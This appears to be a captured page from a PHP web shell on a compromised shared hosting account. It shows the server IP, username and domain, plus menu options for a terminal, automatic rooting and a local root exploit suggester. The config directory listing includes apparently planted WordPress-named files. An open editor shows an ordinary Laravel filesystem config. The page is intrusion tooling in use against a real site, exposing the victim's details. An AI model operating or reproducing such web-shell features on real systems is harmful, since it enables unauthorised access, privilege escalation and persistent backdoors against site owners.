Linux business57.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
Server IP : 199.188.201.191 & Your IP : 3.137.161.247
Domains :
Cant Read [ /etc/named.conf ]
User : derozboy
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
derozboy /
morseltavo-group.online /
config /
Delete
Unzip
Name
Size
Permission
Date
Action
.htaccess
237
B
-r-xr-xr-x
2025-04-29 07:44
app.php
9.43
KB
-rw-r--r--
2021-09-17 20:42
auth.php
3.71
KB
-rw-r--r--
2021-05-03 14:33
broadcasting.php
1.56
KB
-rw-r--r--
2020-06-30 11:49
cache.php
3.03
KB
-rw-r--r--
2020-06-30 11:49
cors.php
823
B
-rw-r--r--
2020-06-30 11:49
database.php
5.31
KB
-rw-r--r--
2021-08-11 12:44
debugbar.php
7.86
KB
-rw-r--r--
2021-09-01 14:41
error_log
264
B
-rw-r--r--
2025-04-22 06:09
filesystems.php
2.63
KB
-rw-r--r--
2020-06-30 11:49
hashing.php
1.53
KB
-rw-r--r--
2020-06-30 11:49
logging.php
2.83
KB
-rw-r--r--
2020-06-30 11:49
mail.php
3.29
KB
-rw-r--r--
2020-06-30 11:49
queue.php
2.7
KB
-rw-r--r--
2020-06-30 11:49
recaptchav3.php
192
B
-rw-r--r--
2021-09-17 20:44
services.php
950
B
-rw-r--r--
2020-06-30 11:49
session.php
6.88
KB
-rw-r--r--
2020-06-30 11:49
view.php
1.03
KB
-rw-r--r--
2020-06-30 11:49
wp-blog-header.php
2.73
KB
-r--r--r--
2025-04-22 01:18
wp-cron.php
2.73
KB
-rw-r--r--
2025-04-22 01:18
Save
Rename
<?php return [ /* |-------------------------------------------------------------------------- | Default Filesystem Disk |-------------------------------------------------------------------------- | | Here you may specify the default filesystem disk that should be used | by the framework. The "local" disk, as well as a variety of cloud | based disks are available to your application. Just store away! | */ 'default' => env('FILESYSTEM_DRIVER', 'local'), /* |-------------------------------------------------------------------------- | Default Cloud Filesystem Disk |-------------------------------------------------------------------------- | | Many applications store files both locally and in the cloud. For this | reason, you may specify a default "cloud" driver here. This driver | will be bound as the Cloud disk implementation in the container. | */ 'cloud' => env('FILESYSTEM_CLOUD', 's3'), /* |-------------------------------------------------------------------------- | Filesystem Disks |-------------------------------------------------------------------------- | | Here you may configure as many filesystem "disks" as you wish, and you | may even configure multiple disks of the same driver. Defaults have | been setup for each driver as an example of the required options. | | Supported Drivers: "local", "ftp", "sftp", "s3" | */ 'disks' => [ 'local' => [ 'driver' => 'local', 'root' => storage_path('app'), ], 'public' => [ 'driver' => 'local', 'root' => storage_path('app/public'), 'url' => env('APP_URL').'/storage', 'visibility' => 'public', ], 's3' => [ 'driver' => 's3', 'key' => env('AWS_ACCESS_KEY_ID'), 'secret' => env('AWS_SECRET_ACCESS_KEY'), 'region' => env('AWS_DEFAULT_REGION'), 'bucket' => env('AWS_BUCKET'), 'url' => env('AWS_URL'), 'endpoint' => env('AWS_ENDPOINT'), ], ], /* |-------------------------------------------------------------------------- | Symbolic Links |-------------------------------------------------------------------------- | | Here you may configure the symbolic links that will be created when the | `storage:link` Artisan command is executed. The array keys should be | the locations of the links and the values should be their targets. | */ 'links' => [ public_path('storage') => storage_path('app/public'), ], ];